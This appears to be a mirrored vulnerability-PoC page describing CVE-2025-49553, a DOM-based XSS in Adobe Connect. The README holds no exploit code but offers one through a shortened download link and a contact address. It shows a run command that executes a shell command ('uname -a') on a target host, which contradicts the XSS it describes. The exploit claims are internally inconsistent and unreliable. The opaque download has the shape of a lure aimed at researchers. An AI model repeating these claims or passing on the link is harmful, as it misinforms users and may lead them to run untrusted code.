POC详情: ab36b9fa582ca814ca0b0f7caecbbffa87b973a8

来源
关联漏洞
标题: Adobe Connect 跨站脚本漏洞 (CVE-2025-49553)
描述:Adobe Connect是美国奥多比(Adobe)公司的一个用于创建会议环境的软件。 Adobe Connect 12.9及之前版本存在跨站脚本漏洞,该漏洞源于DOM型跨站脚本漏洞,可能导致攻击者在受害者浏览器中执行恶意脚本。
介绍
# CVE-2025-49553
# Improper Neutralization of Input During Web Page Generation(CVE-2025-49553)

## Overview

A DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Connect versions 12.9 and earlier that allows attackers to execute malicious scripts in a victim's browser through a crafted web page.

## Details

- **CVE ID**: [CVE-2025-49553](https://nvd.nist.gov/vuln/detail/CVE-2025-49553)
- **Discovered**: 2025-10-15
- **Published**: 2025-10-15
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description
An attacker can : - Execute malicious scripts in a victim's browser - Achieve session takeover - Compromise confidentiality and integrity of user sessions - Target users by tricking them into navigating to a malicious web page


## Affected Versions

**Adobe Connect:**

- versions 12.9 and earlier

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **silentexploitexe@exp.in**

## Exploit:
### Download [here](https://tinyurl.com/478kt5zu)

文件快照

[4.0K] /data/pocs/ab36b9fa582ca814ca0b0f7caecbbffa87b973a8 └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。